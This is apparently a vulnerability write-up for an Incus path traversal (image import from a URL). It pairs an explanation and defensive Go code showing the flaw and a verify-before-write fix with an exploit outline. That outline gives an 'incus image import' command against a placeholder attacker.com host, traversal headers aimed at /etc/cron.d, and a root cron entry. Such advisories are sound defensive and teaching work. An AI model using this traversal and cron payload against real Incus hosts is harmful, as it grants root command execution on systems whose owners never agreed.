How the CVE works
The vulnerability resides in the image import functionality of the Incus daemon (incusd) when handling images from a URL (source.type=url).
The flaw is triggered in the following sequence:
- When a user initiates an image import from a URL, the daemon makes an initial `HEAD` request to the user-supplied URL to gather image metadata.
- The malicious server answers with two headers, `Incus-Image-Hash` and `Incus-Image-URL`. The `Incus-Image-Hash` value is taken directly from the attacker's response and passed as the `Alias` parameter to `ImageDownload()`.
- This attacker-controlled `Alias` string is then used as the filename (`fp`) for the downloaded image. The daemon builds the destination path with `filepath.Join(destDir, fp)` and never checks that the result still lies under `destDir`, so a traversal payload such as `../../../../etc/cron.d/payload` in the `Incus-Image-Hash` header escapes the image storage directory.
- The daemon then enters the `direct` protocol branch, opens the crafted path with `os.Create()` and streams the HTTP response body fetched from `Incus-Image-URL` into it.
- Critically, the SHA-256 check of the downloaded file runs only after the file has been created and fully written. It can reject the image afterwards, but it cannot prevent the write.
- The cleanup routine that deletes the file on failure runs only once the copy of the HTTP response body has finished. By holding the response open for an extended period (e.g., 90 seconds), the attacker keeps the malicious file on disk for that long, which is enough for a consumer such as cron, which rescans `/etc/cron.d` every minute, to act on it.
This sequence allows an attacker to write attacker-chosen content to any location on the host filesystem with the privileges of `incusd`, which runs as root.
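The two root causes in the sequence above, an unchecked filename and a hash check that runs after the write, can be shown side by side. The following Go program is an added example written for this page; it is not Incus code and does not reproduce the real `ImageDownload()` fix. `vulnerableImagePath` mirrors the unsanitised `filepath.Join`, `safeImagePath` accepts only a 64-character hex fingerprint and additionally proves the resolved path stays under the image directory, and `downloadVerifyCommit` streams the body into a temporary file, checks the SHA-256 and only then renames it into place. The function names, the `/var/lib/incus/images` directory in `main` and the image bytes are assumptions for the demonstration.

```go
package main

import (
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
	"io"
	"os"
	"path/filepath"
	"strings"
)

// vulnerableImagePath mirrors the flawed pattern in the write-up: the
// attacker-supplied alias is joined onto destDir with no check, so a
// "../" payload walks out of the image directory.
func vulnerableImagePath(destDir, alias string) string {
	return filepath.Join(destDir, alias)
}

// safeImagePath only accepts a lowercase hex SHA-256 fingerprint (64 chars)
// as the filename and, as a second line of defence, proves the resolved
// path is still inside destDir.
func safeImagePath(destDir, alias string) (string, error) {
	if len(alias) != sha256.Size*2 {
		return "", fmt.Errorf("alias %q is not a SHA-256 fingerprint", alias)
	}
	if _, err := hex.DecodeString(alias); err != nil {
		return "", fmt.Errorf("alias %q is not hex: %w", alias, err)
	}
	dest := filepath.Clean(destDir)
	p := filepath.Join(dest, alias)
	rel, err := filepath.Rel(dest, p)
	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", errors.New("resolved path escapes the image directory")
	}
	return p, nil
}

// downloadVerifyCommit inverts the "validate after write" order: the body is
// streamed into a temporary file inside destDir while being hashed, and it is
// renamed to its final name only after the hash matches. A bad hash or a
// dropped connection leaves nothing behind at the final path.
func downloadVerifyCommit(destDir, expectedHash string, body io.Reader) (string, error) {
	final, err := safeImagePath(destDir, expectedHash)
	if err != nil {
		return "", err
	}
	tmp, err := os.CreateTemp(destDir, ".incus-download-*")
	if err != nil {
		return "", err
	}
	tmpName := tmp.Name()
	defer os.Remove(tmpName) // no-op after a successful rename; removes the partial file otherwise

	h := sha256.New()
	if _, err := io.Copy(io.MultiWriter(tmp, h), body); err != nil {
		tmp.Close()
		return "", err
	}
	if err := tmp.Close(); err != nil {
		return "", err
	}
	if got := hex.EncodeToString(h.Sum(nil)); got != expectedHash {
		return "", fmt.Errorf("hash mismatch: got %s, want %s", got, expectedHash)
	}
	if err := os.Rename(tmpName, final); err != nil {
		return "", err
	}
	return final, nil
}

func main() {
	const destDir = "/var/lib/incus/images" // assumed image directory; only used for path arithmetic
	payload := "../../../../etc/cron.d/payload"
	fmt.Println("vulnerable:", vulnerableImagePath(destDir, payload))
	if _, err := safeImagePath(destDir, payload); err != nil {
		fmt.Println("hardened:  ", err)
	}

	// Constructed image content, written to a scratch directory.
	dir, _ := os.MkdirTemp("", "incus-demo")
	defer os.RemoveAll(dir)
	data := "constructed image bytes"
	sum := sha256.Sum256([]byte(data))
	out, err := downloadVerifyCommit(dir, hex.EncodeToString(sum[:]), strings.NewReader(data))
	fmt.Println("committed:", out, err)
	_, err = downloadVerifyCommit(dir, strings.Repeat("00", 32), strings.NewReader(data))
	fmt.Println("rejected: ", err)
}
```

The temporary file is created inside `destDir` so the final `os.Rename` is an atomic move on the same filesystem; a slow or never-completing response therefore leaves only a dot-prefixed scratch file in the image directory, never a file at an attacker-chosen path.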
DailyCVE Form
Platform: Incus
Version: < 6.23.0
Vulnerability: Path Traversal
Severity: Critical
Date: 2026-03-26
Prediction: 2026-04-15
What Undercode Say
Analytics:
The vulnerability is a classic case of improper input validation leading to path traversal (CWE-22). The root cause is the trust placed in the attacker-controlled `Incus-Image-Hash` header before it is validated: a fingerprint should only ever be a fixed-length hex string, and anything else should be rejected before it is used as a filename. The underlying design flaw is the "validate after write" pattern, in which the hash check can only detect a bad file once it already exists on disk, which is exactly the exploitation window. Holding the response open (a slowloris-style slow transfer) to prolong the file's life on disk is an effective way to defeat a cleanup routine that only runs after the copy completes.
Bash commands and codes related to the blog
To check your Incus version:
incus --version
To trigger the vulnerability on an unpatched daemon (assuming a malicious server is running at the given URL):
incus image import http://attacker.com/stage --alias my-image
A snippet of the vulnerable code path in cmd/incusd/images.go:
// cmd/incusd/images.go - The HEAD request is made before validation
head, err := http.NewRequest("HEAD", req.Source.URL, nil)
// ...
hash := raw.Header.Get("Incus-Image-Hash")
// ...
info, _, err := ImageDownload(ctx, r, s, op, &ImageDownloadArgs{
	Server:   url,
	Protocol: "direct",
	Alias:    hash, // <-- Attacker-controlled value used as filename
	// ...
})
Exploit
A working proof-of-concept involves setting up a malicious HTTP server that responds to the `HEAD` request with a traversal payload in the `Incus-Image-Hash` header and serves the malicious payload in the subsequent `GET` request. The server then holds the connection open to prevent immediate cleanup.
Example malicious server response headers:
Incus-Image-Hash: ../../../../etc/cron.d/incus-rce
Incus-Image-URL: http://attacker.com/payload
The `payload` served by the server would contain a cron job definition. A file in `/etc/cron.d` needs the five schedule fields and the user name before the command, so a minimal entry that fires every minute is:
* * * * * root /bin/sh -c 'id > /tmp/incus_rce'
By importing an image from this server, the attacker writes a cron job to the host, leading to arbitrary command execution as root.
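The exchange above can be modelled end to end without touching a real Incus host. The Go program below is an added example for this page, not Incus code and not a copy of the real fix: `maliciousHandler` is a constructed stand-in for the attacker's server that answers `HEAD` with the two headers shown, `headImageMetadata` issues the same initial `HEAD` request the daemon makes, and `validateImageMeta` is the check that would have rejected the traversal value before it could ever become a filename or trigger the follow-up `GET`. The in-process transport, the `attacker.com` host (taken from the write-up as a placeholder) and the function names are assumptions; nothing is written to disk and no socket is opened.

```go
package main

import (
	"encoding/hex"
	"fmt"
	"net/http"
	"net/http/httptest"
	"net/url"
)

// ImageMeta holds the two headers the daemon reads from the HEAD response.
type ImageMeta struct {
	Hash string
	URL  string
}

// maliciousHandler is a constructed stand-in for the attacker's server: it
// answers the HEAD request with a traversal payload in Incus-Image-Hash and
// points Incus-Image-URL at the body it wants written to that path.
func maliciousHandler() http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		w.Header().Set("Incus-Image-Hash", "../../../../etc/cron.d/incus-rce")
		w.Header().Set("Incus-Image-URL", "http://attacker.com/payload") // placeholder host from the write-up
		w.WriteHeader(http.StatusOK)
	})
}

// inProcess routes an http.Client straight to a handler so the exchange
// runs offline, without opening a socket.
type inProcess struct{ h http.Handler }

func (t inProcess) RoundTrip(r *http.Request) (*http.Response, error) {
	rec := httptest.NewRecorder()
	t.h.ServeHTTP(rec, r)
	return rec.Result(), nil
}

// headImageMetadata performs the daemon's initial HEAD request and returns
// the two attacker-influenced headers exactly as received.
func headImageMetadata(client *http.Client, src string) (ImageMeta, error) {
	req, err := http.NewRequest(http.MethodHead, src, nil)
	if err != nil {
		return ImageMeta{}, err
	}
	resp, err := client.Do(req)
	if err != nil {
		return ImageMeta{}, err
	}
	defer resp.Body.Close()
	return ImageMeta{
		Hash: resp.Header.Get("Incus-Image-Hash"),
		URL:  resp.Header.Get("Incus-Image-URL"),
	}, nil
}

// validateImageMeta is the check the vulnerable path lacked. It must run
// before the hash is used as an alias or filename and before any GET is
// issued to Incus-Image-URL.
func validateImageMeta(m ImageMeta) error {
	if len(m.Hash) != 64 {
		return fmt.Errorf("Incus-Image-Hash %q is not a SHA-256 fingerprint", m.Hash)
	}
	if _, err := hex.DecodeString(m.Hash); err != nil {
		return fmt.Errorf("Incus-Image-Hash %q is not hex", m.Hash)
	}
	u, err := url.Parse(m.URL)
	if err != nil || (u.Scheme != "http" && u.Scheme != "https") || u.Host == "" {
		return fmt.Errorf("Incus-Image-URL %q is not an absolute http(s) URL", m.URL)
	}
	return nil
}

func main() {
	client := &http.Client{Transport: inProcess{maliciousHandler()}}
	meta, err := headImageMetadata(client, "http://attacker.com/stage")
	if err != nil {
		panic(err)
	}
	fmt.Printf("HEAD returned hash=%q url=%q\n", meta.Hash, meta.URL)
	fmt.Println("validation:", validateImageMeta(meta))
}
```

Rejecting the metadata at this point also closes the slow-response trick: if the daemon never issues the `GET` to `Incus-Image-URL`, there is no connection for the attacker to hold open and no file whose deletion can be delayed.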
Protection
- Upgrade: The primary and most effective mitigation is to upgrade Incus to version 6.23.0 or later, which patches this vulnerability.
- Network Restrictions: Implement strict firewall rules to prevent the Incus server from making outbound HTTP requests to untrusted or arbitrary networks. This limits the attack surface by restricting the servers from which images can be imported.
- Project Restrictions: Utilize Incus project restrictions, such as `restricted.images.servers`, to limit the image sources that users can use, although note that this alone was shown to be insufficient for the `HEAD` request part of the attack.
Impact
- Arbitrary File Write: An attacker can write files to any location on the host filesystem with root privileges.
- Privilege Escalation: By writing to sensitive system files (e.g., cron jobs, `/etc/passwd`, SSH keys, or `core_pattern`), an attacker can achieve full privilege escalation to root.
- Denial of Service: Overwriting critical system files can render the host system inoperable.
- Command Execution: The ability to write arbitrary files as root directly translates to the ability to execute arbitrary commands on the host, leading to a complete system compromise.
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

